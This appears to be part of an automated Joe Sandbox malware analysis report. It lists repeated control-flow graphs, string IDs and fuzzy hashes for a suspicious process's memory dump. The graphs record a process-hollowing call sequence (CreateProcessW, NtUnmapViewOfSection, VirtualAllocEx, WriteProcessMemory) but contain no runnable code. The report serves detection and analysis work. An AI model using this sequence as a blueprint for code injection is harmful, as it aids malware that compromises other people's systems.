                    control_flow_graph 1289 d91892-d918c8 call d90702 VirtualFree call d918d5 1296 d918ca-d918cb 1289->1296 1297 d91936-d9193b 1289->1297 1298 d9193d-d91948 call d90702 1296->1298 1299 d918ce-d918d2 1296->1299 1297->1298 1301 d9194d-d91976 call d91983 1298->1301 1299->1301 1302 d918d4-d918eb 1299->1302 1325 d91978-d91979 1301->1325 1326 d919e4-d919e9 1301->1326 1305 d918ed-d9190c call d9003a 1302->1305 1306 d9190e-d91934 call d905f3 * 2 1302->1306 1305->1306 1306->1297 1327 d919eb-d919f6 call d90702 1325->1327 1329 d9197c-d91980 1325->1329 1326->1327 1330 d919fb-d91a13 call d91a22 1327->1330 1329->1330 1331 d91982-d91999 1329->1331 1353 d91a59 1330->1353 1354 d91a16-d91a38 1330->1354 1335 d9199b-d919ba call d9003a 1331->1335 1336 d919bc-d919e2 call d905f3 * 2 1331->1336 1335->1336 1336->1326 1355 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 1353->1355 1354->1355 1360 d91a3a-d91a54 call d9003a 1354->1360 1384 d91b0f-d91b10 1355->1384 1385 d91b74 1355->1385 1360->1353 1386 d91b12-d91b13 1384->1386 1387 d91b77-d91b83 1384->1387 1388 d91b75 1385->1388 1389 d91b74 call d905f3 1385->1389 1392 d91b15-d91b31 1386->1392 1393 d91b84 1386->1393 1394 d91b87-d91bde call d90702 CreateProcessW call d91bf2 1387->1394 1390 d91b7a-d91b83 1388->1390 1391 d91b75 call d905f3 1388->1391 1389->1388 1390->1394 1391->1390 1399 d91b33-d91b52 call d9003a 1392->1399 1400 d91b54-d91b75 call d905f3 * 2 1392->1400 1393->1394 1416 d91be0-d91be3 1394->1416 1417 d91c35-d91c39 call d905f3 1394->1417 1399->1400 1400->1390 1420 d91c3b 1416->1420 1421 d91be5-d91c08 1416->1421 1423 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 1417->1423 1420->1423 1425 d91c2b-d91c34 1421->1425 1426 d91c0a-d91c29 call d9003a 1421->1426 1445 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 1423->1445 1446 d91cc8-d91ce7 call d9003a 1423->1446 1425->1417 1426->1425 1468 d91dd9 1445->1468 1469 d91d70-d91d78 1445->1469 1446->1445 1471 d91dda 1468->1471 1472 d91dd9 call d905f3 1468->1472 1476 d91d7a-d91d7d 1469->1476 1477 d91dc7-d91dda call d905f3 * 2 1469->1477 1473 d91ddf-d91df3 call d90702 1471->1473 1474 d91dda call d905f3 1471->1474 1472->1471 1480 d91df8-d91e54 WriteProcessMemory call d91e3e 1473->1480 1474->1473 1476->1480 1481 d91d7f-d91d96 1476->1481 1477->1473 1505 d91e77-d91ec3 call d905f3 * 2 call d90702 1480->1505 1506 d91e56-d91e75 call d9003a 1480->1506 1487 d91db9-d91dc3 1481->1487 1488 d91d98-d91db7 call d9003a 1481->1488 1487->1477 1488->1487 1506->1505
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction ID: a4e908b56dc978b6ff007bd212fe6a69a6346ce3d8a7fdb702832f57bbf98603
                    • Opcode Fuzzy Hash: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction Fuzzy Hash: 77E1AD3DB19617FDEF16A7618C12F3D699AFB81B05F249519F0839A182EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1524 d91899-d918c8 call d90702 VirtualFree call d918d5 1531 d918ca-d918cb 1524->1531 1532 d91936-d9193b 1524->1532 1533 d9193d-d91948 call d90702 1531->1533 1534 d918ce-d918d2 1531->1534 1532->1533 1536 d9194d-d91976 call d91983 1533->1536 1534->1536 1537 d918d4-d918eb 1534->1537 1560 d91978-d91979 1536->1560 1561 d919e4-d919e9 1536->1561 1540 d918ed-d9190c call d9003a 1537->1540 1541 d9190e-d91934 call d905f3 * 2 1537->1541 1540->1541 1541->1532 1562 d919eb-d919f6 call d90702 1560->1562 1564 d9197c-d91980 1560->1564 1561->1562 1565 d919fb-d91a13 call d91a22 1562->1565 1564->1565 1566 d91982-d91999 1564->1566 1588 d91a59 1565->1588 1589 d91a16-d91a38 1565->1589 1570 d9199b-d919ba call d9003a 1566->1570 1571 d919bc-d919e2 call d905f3 * 2 1566->1571 1570->1571 1571->1561 1590 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 1588->1590 1589->1590 1595 d91a3a-d91a54 call d9003a 1589->1595 1619 d91b0f-d91b10 1590->1619 1620 d91b74 1590->1620 1595->1588 1621 d91b12-d91b13 1619->1621 1622 d91b77-d91b83 1619->1622 1623 d91b75 1620->1623 1624 d91b74 call d905f3 1620->1624 1627 d91b15-d91b31 1621->1627 1628 d91b84 1621->1628 1629 d91b87-d91bde call d90702 CreateProcessW call d91bf2 1622->1629 1625 d91b7a-d91b83 1623->1625 1626 d91b75 call d905f3 1623->1626 1624->1623 1625->1629 1626->1625 1634 d91b33-d91b52 call d9003a 1627->1634 1635 d91b54-d91b75 call d905f3 * 2 1627->1635 1628->1629 1651 d91be0-d91be3 1629->1651 1652 d91c35-d91c39 call d905f3 1629->1652 1634->1635 1635->1625 1655 d91c3b 1651->1655 1656 d91be5-d91c08 1651->1656 1658 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 1652->1658 1655->1658 1660 d91c2b-d91c34 1656->1660 1661 d91c0a-d91c29 call d9003a 1656->1661 1680 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 1658->1680 1681 d91cc8-d91ce7 call d9003a 1658->1681 1660->1652 1661->1660 1703 d91dd9 1680->1703 1704 d91d70-d91d78 1680->1704 1681->1680 1706 d91dda 1703->1706 1707 d91dd9 call d905f3 1703->1707 1711 d91d7a-d91d7d 1704->1711 1712 d91dc7-d91dda call d905f3 * 2 1704->1712 1708 d91ddf-d91df3 call d90702 1706->1708 1709 d91dda call d905f3 1706->1709 1707->1706 1715 d91df8-d91e54 WriteProcessMemory call d91e3e 1708->1715 1709->1708 1711->1715 1716 d91d7f-d91d96 1711->1716 1712->1708 1740 d91e77-d91ec3 call d905f3 * 2 call d90702 1715->1740 1741 d91e56-d91e75 call d9003a 1715->1741 1722 d91db9-d91dc3 1716->1722 1723 d91d98-d91db7 call d9003a 1716->1723 1722->1712 1723->1722 1741->1740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction ID: 8c5378ce689e8cb20dc1759d8ee48188671ecce060d0852ccd6acccb316de79d
                    • Opcode Fuzzy Hash: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction Fuzzy Hash: DEE1AE3DB19617FDEF16A7618C22F3D699AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1759 d918d5-d918eb 1761 d918ed-d9190c call d9003a 1759->1761 1762 d9190e-d91976 call d905f3 * 2 call d90702 call d91983 1759->1762 1761->1762 1787 d91978-d91979 1762->1787 1788 d919e4-d919e9 1762->1788 1789 d919eb-d919f6 call d90702 1787->1789 1790 d9197c-d91980 1787->1790 1788->1789 1791 d919fb-d91a13 call d91a22 1789->1791 1790->1791 1792 d91982-d91999 1790->1792 1814 d91a59 1791->1814 1815 d91a16-d91a38 1791->1815 1796 d9199b-d919ba call d9003a 1792->1796 1797 d919bc-d919e2 call d905f3 * 2 1792->1797 1796->1797 1797->1788 1816 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 1814->1816 1815->1816 1821 d91a3a-d91a54 call d9003a 1815->1821 1845 d91b0f-d91b10 1816->1845 1846 d91b74 1816->1846 1821->1814 1847 d91b12-d91b13 1845->1847 1848 d91b77-d91b83 1845->1848 1849 d91b75 1846->1849 1850 d91b74 call d905f3 1846->1850 1853 d91b15-d91b31 1847->1853 1854 d91b84 1847->1854 1855 d91b87-d91bde call d90702 CreateProcessW call d91bf2 1848->1855 1851 d91b7a-d91b83 1849->1851 1852 d91b75 call d905f3 1849->1852 1850->1849 1851->1855 1852->1851 1860 d91b33-d91b52 call d9003a 1853->1860 1861 d91b54-d91b75 call d905f3 * 2 1853->1861 1854->1855 1877 d91be0-d91be3 1855->1877 1878 d91c35-d91c39 call d905f3 1855->1878 1860->1861 1861->1851 1881 d91c3b 1877->1881 1882 d91be5-d91c08 1877->1882 1884 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 1878->1884 1881->1884 1886 d91c2b-d91c34 1882->1886 1887 d91c0a-d91c29 call d9003a 1882->1887 1906 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 1884->1906 1907 d91cc8-d91ce7 call d9003a 1884->1907 1886->1878 1887->1886 1929 d91dd9 1906->1929 1930 d91d70-d91d78 1906->1930 1907->1906 1932 d91dda 1929->1932 1933 d91dd9 call d905f3 1929->1933 1937 d91d7a-d91d7d 1930->1937 1938 d91dc7-d91dda call d905f3 * 2 1930->1938 1934 d91ddf-d91df3 call d90702 1932->1934 1935 d91dda call d905f3 1932->1935 1933->1932 1941 d91df8-d91e54 WriteProcessMemory call d91e3e 1934->1941 1935->1934 1937->1941 1942 d91d7f-d91d96 1937->1942 1938->1934 1966 d91e77-d91ec3 call d905f3 * 2 call d90702 1941->1966 1967 d91e56-d91e75 call d9003a 1941->1967 1948 d91db9-d91dc3 1942->1948 1949 d91d98-d91db7 call d9003a 1942->1949 1948->1938 1949->1948 1967->1966
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction ID: d63e4ae5fff5cc92277b64da135a9d720dd6281029ef70ecddb5e39f52d1989a
                    • Opcode Fuzzy Hash: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction Fuzzy Hash: 88E1BD3DB59613FEEF16A7618C12F3D799AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2209 d918ff-d91976 call d9003a call d905f3 * 2 call d90702 call d91983 2234 d91978-d91979 2209->2234 2235 d919e4-d919e9 2209->2235 2236 d919eb-d919f6 call d90702 2234->2236 2237 d9197c-d91980 2234->2237 2235->2236 2238 d919fb-d91a13 call d91a22 2236->2238 2237->2238 2239 d91982-d91999 2237->2239 2261 d91a59 2238->2261 2262 d91a16-d91a38 2238->2262 2243 d9199b-d919ba call d9003a 2239->2243 2244 d919bc-d919e2 call d905f3 * 2 2239->2244 2243->2244 2244->2235 2263 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 2261->2263 2262->2263 2268 d91a3a-d91a54 call d9003a 2262->2268 2292 d91b0f-d91b10 2263->2292 2293 d91b74 2263->2293 2268->2261 2294 d91b12-d91b13 2292->2294 2295 d91b77-d91b83 2292->2295 2296 d91b75 2293->2296 2297 d91b74 call d905f3 2293->2297 2300 d91b15-d91b31 2294->2300 2301 d91b84 2294->2301 2302 d91b87-d91bde call d90702 CreateProcessW call d91bf2 2295->2302 2298 d91b7a-d91b83 2296->2298 2299 d91b75 call d905f3 2296->2299 2297->2296 2298->2302 2299->2298 2307 d91b33-d91b52 call d9003a 2300->2307 2308 d91b54-d91b75 call d905f3 * 2 2300->2308 2301->2302 2324 d91be0-d91be3 2302->2324 2325 d91c35-d91c39 call d905f3 2302->2325 2307->2308 2308->2298 2328 d91c3b 2324->2328 2329 d91be5-d91c08 2324->2329 2331 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 2325->2331 2328->2331 2333 d91c2b-d91c34 2329->2333 2334 d91c0a-d91c29 call d9003a 2329->2334 2353 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 2331->2353 2354 d91cc8-d91ce7 call d9003a 2331->2354 2333->2325 2334->2333 2376 d91dd9 2353->2376 2377 d91d70-d91d78 2353->2377 2354->2353 2379 d91dda 2376->2379 2380 d91dd9 call d905f3 2376->2380 2384 d91d7a-d91d7d 2377->2384 2385 d91dc7-d91dda call d905f3 * 2 2377->2385 2381 d91ddf-d91df3 call d90702 2379->2381 2382 d91dda call d905f3 2379->2382 2380->2379 2388 d91df8-d91e54 WriteProcessMemory call d91e3e 2381->2388 2382->2381 2384->2388 2389 d91d7f-d91d96 2384->2389 2385->2381 2413 d91e77-d91ec3 call d905f3 * 2 call d90702 2388->2413 2414 d91e56-d91e75 call d9003a 2388->2414 2395 d91db9-d91dc3 2389->2395 2396 d91d98-d91db7 call d9003a 2389->2396 2395->2385 2396->2395 2414->2413
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction ID: b8fe69488217c46b42b79912097f4a713ce109aca2c80ce0e8eb714e5863c70a
                    • Opcode Fuzzy Hash: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction Fuzzy Hash: 2DD18E3DB59613FEEF16A7618C12F3D699AFB81B05F249519B0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1985 d918e3-d918ea 1986 d918ec-d9195b call d9003a call d905f3 * 2 call d90702 1985->1986 1987 d91961-d91976 call d91983 1985->1987 1986->1987 1995 d91978-d91979 1987->1995 1996 d919e4-d919e9 1987->1996 1997 d919eb-d919f6 call d90702 1995->1997 1999 d9197c-d91980 1995->1999 1996->1997 2000 d919fb-d91a13 call d91a22 1997->2000 1999->2000 2001 d91982-d91999 1999->2001 2032 d91a59 2000->2032 2033 d91a16-d91a38 2000->2033 2007 d9199b-d919ba call d9003a 2001->2007 2008 d919bc-d919e2 call d905f3 * 2 2001->2008 2007->2008 2008->1996 2035 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 2032->2035 2033->2035 2041 d91a3a-d91a54 call d9003a 2033->2041 2069 d91b0f-d91b10 2035->2069 2070 d91b74 2035->2070 2041->2032 2071 d91b12-d91b13 2069->2071 2072 d91b77-d91b83 2069->2072 2073 d91b75 2070->2073 2074 d91b74 call d905f3 2070->2074 2077 d91b15-d91b31 2071->2077 2078 d91b84 2071->2078 2079 d91b87-d91bde call d90702 CreateProcessW call d91bf2 2072->2079 2075 d91b7a-d91b83 2073->2075 2076 d91b75 call d905f3 2073->2076 2074->2073 2075->2079 2076->2075 2084 d91b33-d91b52 call d9003a 2077->2084 2085 d91b54-d91b75 call d905f3 * 2 2077->2085 2078->2079 2101 d91be0-d91be3 2079->2101 2102 d91c35-d91c39 call d905f3 2079->2102 2084->2085 2085->2075 2105 d91c3b 2101->2105 2106 d91be5-d91c08 2101->2106 2108 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 2102->2108 2105->2108 2110 d91c2b-d91c34 2106->2110 2111 d91c0a-d91c29 call d9003a 2106->2111 2130 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 2108->2130 2131 d91cc8-d91ce7 call d9003a 2108->2131 2110->2102 2111->2110 2153 d91dd9 2130->2153 2154 d91d70-d91d78 2130->2154 2131->2130 2156 d91dda 2153->2156 2157 d91dd9 call d905f3 2153->2157 2161 d91d7a-d91d7d 2154->2161 2162 d91dc7-d91dda call d905f3 * 2 2154->2162 2158 d91ddf-d91df3 call d90702 2156->2158 2159 d91dda call d905f3 2156->2159 2157->2156 2165 d91df8-d91e54 WriteProcessMemory call d91e3e 2158->2165 2159->2158 2161->2165 2166 d91d7f-d91d96 2161->2166 2162->2158 2190 d91e77-d91ec3 call d905f3 * 2 call d90702 2165->2190 2191 d91e56-d91e75 call d9003a 2165->2191 2172 d91db9-d91dc3 2166->2172 2173 d91d98-d91db7 call d9003a 2166->2173 2172->2162 2173->2172 2191->2190
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction ID: 0b29d9b4544a65169b6c48647a376d29415d03dffd8a383d22b36a85923cea26
                    • Opcode Fuzzy Hash: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction Fuzzy Hash: 1AE18D3DB59613EEEF16A7618C12F3D799AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2858 d91946-d91976 call d90702 call d91983 2868 d91978-d91979 2858->2868 2869 d919e4-d919e9 2858->2869 2870 d919eb-d919f6 call d90702 2868->2870 2871 d9197c-d91980 2868->2871 2869->2870 2872 d919fb-d91a13 call d91a22 2870->2872 2871->2872 2873 d91982-d91999 2871->2873 2895 d91a59 2872->2895 2896 d91a16-d91a38 2872->2896 2877 d9199b-d919ba call d9003a 2873->2877 2878 d919bc-d919e2 call d905f3 * 2 2873->2878 2877->2878 2878->2869 2897 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 2895->2897 2896->2897 2902 d91a3a-d91a54 call d9003a 2896->2902 2926 d91b0f-d91b10 2897->2926 2927 d91b74 2897->2927 2902->2895 2928 d91b12-d91b13 2926->2928 2929 d91b77-d91b83 2926->2929 2930 d91b75 2927->2930 2931 d91b74 call d905f3 2927->2931 2934 d91b15-d91b31 2928->2934 2935 d91b84 2928->2935 2936 d91b87-d91bde call d90702 CreateProcessW call d91bf2 2929->2936 2932 d91b7a-d91b83 2930->2932 2933 d91b75 call d905f3 2930->2933 2931->2930 2932->2936 2933->2932 2941 d91b33-d91b52 call d9003a 2934->2941 2942 d91b54-d91b75 call d905f3 * 2 2934->2942 2935->2936 2958 d91be0-d91be3 2936->2958 2959 d91c35-d91c39 call d905f3 2936->2959 2941->2942 2942->2932 2962 d91c3b 2958->2962 2963 d91be5-d91c08 2958->2963 2965 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 2959->2965 2962->2965 2967 d91c2b-d91c34 2963->2967 2968 d91c0a-d91c29 call d9003a 2963->2968 2987 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 2965->2987 2988 d91cc8-d91ce7 call d9003a 2965->2988 2967->2959 2968->2967 3010 d91dd9 2987->3010 3011 d91d70-d91d78 2987->3011 2988->2987 3013 d91dda 3010->3013 3014 d91dd9 call d905f3 3010->3014 3018 d91d7a-d91d7d 3011->3018 3019 d91dc7-d91dda call d905f3 * 2 3011->3019 3015 d91ddf-d91df3 call d90702 3013->3015 3016 d91dda call d905f3 3013->3016 3014->3013 3022 d91df8-d91e54 WriteProcessMemory call d91e3e 3015->3022 3016->3015 3018->3022 3023 d91d7f-d91d96 3018->3023 3019->3015 3047 d91e77-d91ec3 call d905f3 * 2 call d90702 3022->3047 3048 d91e56-d91e75 call d9003a 3022->3048 3029 d91db9-d91dc3 3023->3029 3030 d91d98-d91db7 call d9003a 3023->3030 3029->3019 3030->3029 3048->3047
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction ID: 8440ca84c3f161b70d7a9886fe45f9bd29f4cc35130eea0ef06dd4e9eb0f88f0
                    • Opcode Fuzzy Hash: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction Fuzzy Hash: 9FD1BE3DB59613EEEF16A7718C12F3D799AFB81B05F249519F0839A142EE34CE026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3066 d91963-d91976 call d91983 3070 d91978-d91979 3066->3070 3071 d919e4-d919e9 3066->3071 3072 d919eb-d919f6 call d90702 3070->3072 3073 d9197c-d91980 3070->3073 3071->3072 3074 d919fb-d91a13 call d91a22 3072->3074 3073->3074 3075 d91982-d91999 3073->3075 3097 d91a59 3074->3097 3098 d91a16-d91a38 3074->3098 3079 d9199b-d919ba call d9003a 3075->3079 3080 d919bc-d919e2 call d905f3 * 2 3075->3080 3079->3080 3080->3071 3099 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 3097->3099 3098->3099 3104 d91a3a-d91a54 call d9003a 3098->3104 3128 d91b0f-d91b10 3099->3128 3129 d91b74 3099->3129 3104->3097 3130 d91b12-d91b13 3128->3130 3131 d91b77-d91b83 3128->3131 3132 d91b75 3129->3132 3133 d91b74 call d905f3 3129->3133 3136 d91b15-d91b31 3130->3136 3137 d91b84 3130->3137 3138 d91b87-d91bde call d90702 CreateProcessW call d91bf2 3131->3138 3134 d91b7a-d91b83 3132->3134 3135 d91b75 call d905f3 3132->3135 3133->3132 3134->3138 3135->3134 3143 d91b33-d91b52 call d9003a 3136->3143 3144 d91b54-d91b75 call d905f3 * 2 3136->3144 3137->3138 3160 d91be0-d91be3 3138->3160 3161 d91c35-d91c39 call d905f3 3138->3161 3143->3144 3144->3134 3164 d91c3b 3160->3164 3165 d91be5-d91c08 3160->3165 3167 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 3161->3167 3164->3167 3169 d91c2b-d91c34 3165->3169 3170 d91c0a-d91c29 call d9003a 3165->3170 3189 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 3167->3189 3190 d91cc8-d91ce7 call d9003a 3167->3190 3169->3161 3170->3169 3212 d91dd9 3189->3212 3213 d91d70-d91d78 3189->3213 3190->3189 3215 d91dda 3212->3215 3216 d91dd9 call d905f3 3212->3216 3220 d91d7a-d91d7d 3213->3220 3221 d91dc7-d91dda call d905f3 * 2 3213->3221 3217 d91ddf-d91df3 call d90702 3215->3217 3218 d91dda call d905f3 3215->3218 3216->3215 3224 d91df8-d91e54 WriteProcessMemory call d91e3e 3217->3224 3218->3217 3220->3224 3225 d91d7f-d91d96 3220->3225 3221->3217 3249 d91e77-d91ec3 call d905f3 * 2 call d90702 3224->3249 3250 d91e56-d91e75 call d9003a 3224->3250 3231 d91db9-d91dc3 3225->3231 3232 d91d98-d91db7 call d9003a 3225->3232 3231->3221 3232->3231 3250->3249
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: e605bd3c0e246f08737236fa7de905c815f15f95786545e65953fbd56888bc4b
                    • Instruction ID: d23d7c20b8a2205e9d2b85566b898ad97124393e4a7eee7d79708059221c1480
                    • Opcode Fuzzy Hash: e605bd3c0e246f08737236fa7de905c815f15f95786545e65953fbd56888bc4b
                    • Instruction Fuzzy Hash: 46D1BE3DB19617EEEF17A7618C12F3D799AFB81B05F249519F0839A142EE34CE026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3268 d91983-d91999 3270 d9199b-d919ba call d9003a 3268->3270 3271 d919bc-d91a13 call d905f3 * 2 call d90702 call d91a22 3268->3271 3270->3271 3295 d91a59 3271->3295 3296 d91a16-d91a38 3271->3296 3297 d91a5b-d91b0d call d905f3 * 2 call d90702 call d91b1b 3295->3297 3296->3297 3300 d91a3a-d91a54 call d9003a 3296->3300 3324 d91b0f-d91b10 3297->3324 3325 d91b74 3297->3325 3300->3295 3326 d91b12-d91b13 3324->3326 3327 d91b77-d91b83 3324->3327 3328 d91b75 3325->3328 3329 d91b74 call d905f3 3325->3329 3332 d91b15-d91b31 3326->3332 3333 d91b84 3326->3333 3334 d91b87-d91bde call d90702 CreateProcessW call d91bf2 3327->3334 3330 d91b7a-d91b83 3328->3330 3331 d91b75 call d905f3 3328->3331 3329->3328 3330->3334 3331->3330 3339 d91b33-d91b52 call d9003a 3332->3339 3340 d91b54-d91b75 call d905f3 * 2 3332->3340 3333->3334 3356 d91be0-d91be3 3334->3356 3357 d91c35-d91c39 call d905f3 3334->3357 3339->3340 3340->3330 3360 d91c3b 3356->3360 3361 d91be5-d91c08 3356->3361 3363 d91c3e-d91cc6 call d905f3 call d90702 NtUnmapViewOfSection call d91cb0 3357->3363 3360->3363 3365 d91c2b-d91c34 3361->3365 3366 d91c0a-d91c29 call d9003a 3361->3366 3385 d91ce9-d91d6e call d905f3 * 2 call d90702 VirtualAllocEx call d91d80 3363->3385 3386 d91cc8-d91ce7 call d9003a 3363->3386 3365->3357 3366->3365 3408 d91dd9 3385->3408 3409 d91d70-d91d78 3385->3409 3386->3385 3411 d91dda 3408->3411 3412 d91dd9 call d905f3 3408->3412 3416 d91d7a-d91d7d 3409->3416 3417 d91dc7-d91dda call d905f3 * 2 3409->3417 3413 d91ddf-d91df3 call d90702 3411->3413 3414 d91dda call d905f3 3411->3414 3412->3411 3420 d91df8-d91e54 WriteProcessMemory call d91e3e 3413->3420 3414->3413 3416->3420 3421 d91d7f-d91d96 3416->3421 3417->3413 3445 d91e77-d91ec3 call d905f3 * 2 call d90702 3420->3445 3446 d91e56-d91e75 call d9003a 3420->3446 3427 d91db9-d91dc3 3421->3427 3428 d91d98-d91db7 call d9003a 3421->3428 3427->3417 3428->3427 3446->3445
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 748bf721d01c502860e9775896c194a095d8b5eebc9736f8a83b4fbbb4f5a150
                    • Instruction ID: 4b9b2d8e1eb27843f05c7350b74c9aac13bf664741c8cc0fae8aaf9b8075f0fc
                    • Opcode Fuzzy Hash: 748bf721d01c502860e9775896c194a095d8b5eebc9736f8a83b4fbbb4f5a150
                    • Instruction Fuzzy Hash: F4C1BD3DB59613EEEF17A7618C12F3D799AFB81B05F249519F0839A142EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 424baeb5f877a7e89357698537ebc65fbf47ae713fa12991aab065b5bf8d565f
                    • Instruction ID: 87cd23f9624e5e77dfbb3c71cbaf98d0e44f41649cf7ef07dba89b83678fb491
                    • Opcode Fuzzy Hash: 424baeb5f877a7e89357698537ebc65fbf47ae713fa12991aab065b5bf8d565f
                    • Instruction Fuzzy Hash: 12C19D3DB59613EEEF17A7618C12F3D7D9AFB81B05F249519B0839A142EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
